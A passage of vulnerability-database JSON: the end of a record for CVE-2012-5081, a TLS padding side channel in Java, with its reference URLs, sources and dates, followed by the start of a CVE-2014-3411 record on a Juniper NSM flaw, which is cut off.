"http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5893" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3159" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3174" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5888" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0437" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0373" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5789" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1682" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5899" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5801" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5832" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5848" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0415" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2400" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3143" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0438" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5810" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5905" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201401-30.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5904" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5831" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3744" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5854" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2394" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0498" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5777" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0499" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0499" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0409" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4681" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2462" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5083" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0375" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2439" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3136" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0376" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5824" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3342" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5776" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0504" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1722" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5895" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-5035" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2418" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5788" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5887" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0418" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0368" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5902" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0387" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1533" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2438" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1721" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0382" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5812" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3213" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5846" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5775" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5787" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5898" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1481" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5844" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5906" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1491" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5910" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1487" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5907" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5896" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5843" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5067" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0498" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5079" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0411" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1479" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0408" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0402" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5838" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0430" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5088" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.1, "url": "http://icedtea.classpath.org/hg/release/icedtea6-1.11/file/icedtea6-1.11.5/news" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-1384.html" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b24-1.11.5-0ubuntu1~11.10.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5070" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b24-1.11.5-0ubuntu1~12.04.1" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-1619-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-7/7u9-2.3.3-0ubuntu1~12.10.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b24-1.11.5-0ubuntu1~10.04.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b24-1.11.5-0ubuntu1~11.04.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5076" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5074" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5067" } ], "sources": [ { "db": "CERT/CC", "id": "VU#144389" }, { "db": "VULMON", "id": "CVE-2012-5081" }, { "db": "BID", "id": "56071" }, { "db": "PACKETSTORM", "id": "117454" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "117478" }, { "db": "PACKETSTORM", "id": "119308" }, { "db": "PACKETSTORM", "id": "118306" }, { "db": "PACKETSTORM", "id": "117825" }, { "db": "PACKETSTORM", "id": "118140" }, { "db": "PACKETSTORM", "id": "118835" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "117453" }, { "db": "PACKETSTORM", "id": "117704" }, { "db": "CNNVD", "id": "CNNVD-201210-293" }, { "db": "NVD", "id": "CVE-2012-5081" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#144389" }, { "db": "VULMON", "id": "CVE-2012-5081" }, { "db": "BID", "id": "56071" }, { "db": "PACKETSTORM", "id": "117454" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "117478" }, { "db": "PACKETSTORM", "id": "119308" }, { "db": "PACKETSTORM", "id": "118306" }, { "db": "PACKETSTORM", "id": "117825" }, { "db": "PACKETSTORM", "id": "118140" }, { "db": "PACKETSTORM", "id": "118835" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "117453" }, { "db": "PACKETSTORM", "id": "117704" }, { "db": "CNNVD", "id": "CNNVD-201210-293" }, { "db": "NVD", "id": "CVE-2012-5081" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-12-12T00:00:00", "db": "CERT/CC", "id": "VU#144389" }, { "date": "2012-10-16T00:00:00", "db": "VULMON", "id": "CVE-2012-5081" }, { "date": "2012-10-16T00:00:00", "db": "BID", "id": "56071" }, { "date": "2012-10-18T06:07:56", "db": "PACKETSTORM", "id": "117454" }, { "date": "2013-10-23T22:57:57", "db": "PACKETSTORM", "id": "123734" }, { "date": "2012-10-18T22:02:53", "db": "PACKETSTORM", "id": "117478" }, { "date": "2013-01-08T04:16:56", "db": "PACKETSTORM", "id": "119308" }, { "date": "2012-11-23T16:21:12", "db": "PACKETSTORM", "id": "118306" }, { "date": "2012-11-02T03:34:46", "db": "PACKETSTORM", "id": "117825" }, { "date": "2012-11-16T07:05:59", "db": "PACKETSTORM", "id": "118140" }, { "date": "2012-12-14T02:38:55", "db": "PACKETSTORM", "id": "118835" }, { "date": "2013-10-23T22:58:21", "db": "PACKETSTORM", "id": "123735" }, { "date": "2014-01-27T18:30:13", "db": "PACKETSTORM", "id": "124943" }, { "date": "2012-10-18T06:07:33", "db": "PACKETSTORM", "id": "117453" }, { "date": "2012-10-26T22:43:35", "db": "PACKETSTORM", "id": "117704" }, { "date": "2012-10-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201210-293" }, { "date": "2012-10-16T21:55:02.260000", "db": "NVD", "id": "CVE-2012-5081" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-04-09T00:00:00", "db": "CERT/CC", "id": "VU#144389" }, { "date": "2022-05-13T00:00:00", "db": "VULMON", "id": "CVE-2012-5081" }, { "date": "2017-12-19T22:01:00", "db": "BID", "id": "56071" }, { "date": "2022-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201210-293" }, { "date": "2022-05-13T14:52:54.033000", "db": "NVD", "id": "CVE-2012-5081" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "119308" }, { "db": "PACKETSTORM", "id": "118835" }, { "db": "CNNVD", "id": "CNNVD-201210-293" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "TLS implementations may disclose side channel information via discrepancies between valid and invalid PKCS#1 padding", "sources": [ { "db": "CERT/CC", "id": "VU#144389" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "56071" } ], "trust": 0.3 } }
cve-2014-3411
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://secunia.com/advisories/58684 | third-party-advisory, x_refsource_SECUNIA | |
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10625 | x_refsource_CONFIRM | |
http://www.securitytracker.com/id/1030253 | vdb-entry, x_refsource_SECTRACK | |
http://www.securityfocus.com/bid/67445 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T10:43:05.463Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "58684", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/58684" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10625" }, { "name": "1030253", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1030253" }, { "name": "67445", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/67445" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2014-05-16T00:00:00", "descriptions": [ { "lang": "en", "value": "Unspecified vulnerability in the NSM XDB service in Juniper NSM before 2012.2R8 allows remote attackers to execute arbitrary code via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": 